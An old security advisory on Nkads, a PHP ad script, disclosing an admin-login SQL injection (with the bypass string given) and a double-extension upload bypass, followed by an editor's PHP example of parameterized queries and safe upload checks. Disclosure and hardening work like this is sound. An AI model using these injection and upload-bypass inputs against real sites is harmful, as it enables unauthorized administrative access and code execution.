============================================================
============================================================
Title: Nkads Multiple Remote Vulnerabilities
Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar
Date: 03/01/2006
Severity: High. Remote users can execute arbitrary code.
Affected version: 1.0alfa3
Vendor: http://nkads.nkstudios.net
============================================================
============================================================

* Summary *

Nkads is an ads script written in PHP/SQL.

-------------------------------------------------------------

* Problem Description *

1- Admin login SQL injection:
   Username: ' or 1=1--
   Passwd:   ' or 1=1--

2- Upload filetype bypass:
   The ".jpg" uploader accepts any file type; only the name is checked.
   Example: lol.jpg.php

-------------------------------------------------------------

* Fix *

Contact the vendor...

-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/advisory/nkads_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research.

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar
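Added example (editor's code, not part of the advisory and not Nkads' own source) showing how the two problems above are fixed on the server side in PHP: the login query binds the username as a parameter so `' or 1=1--` is compared as a literal string, and the upload check validates only the final extension, inspects the file content, and stores it under a server-generated name so `lol.jpg.php` cannot be written as a PHP file. Table and column names are assumptions.

```php
<?php
// Editor's example; the admins table and its columns are assumed.

// 1. Admin login. The weak pattern is a query built by string
//    concatenation of $user and $pass; here both values are bound,
//    so a quote in the input cannot change the query structure.
function admin_login(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare(
        'SELECT password_hash FROM admins WHERE username = :u LIMIT 1'
    );
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Passwords are stored hashed; password_verify compares safely.
    return $row !== false && password_verify($pass, $row['password_hash']);
}

// 2. Upload check. Only the LAST extension counts, it must be in the
//    allow-list, and the bytes must parse as an image.
const ALLOWED_IMAGE_EXT = ['jpg', 'jpeg', 'png', 'gif'];

function upload_is_image(string $originalName, string $tmpPath): bool
{
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_IMAGE_EXT, true)) {
        return false;   // "lol.jpg.php" has extension "php" -> rejected
    }
    // Name checks alone are not enough: require real image headers.
    $info = @getimagesize($tmpPath);
    return $info !== false;
}

// The stored name is chosen by the server, never by the uploader, so no
// user-controlled characters or extra extensions reach the filesystem.
function safe_upload_name(string $originalName): string
{
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed usage: a file whose name would have passed a ".jpg" check.
$candidate = 'lol.jpg.php';
if (upload_is_image($candidate, '/tmp/constructed-upload')) {
    $dest = '/var/www/uploads/' . safe_upload_name($candidate);
    // move_uploaded_file($tmpPath, $dest) would go here
} else {
    echo "rejected: $candidate\n";
}
```

Uploads should additionally be served from a directory where the web server does not execute scripts, so a disguised file that slips past the check is still never run.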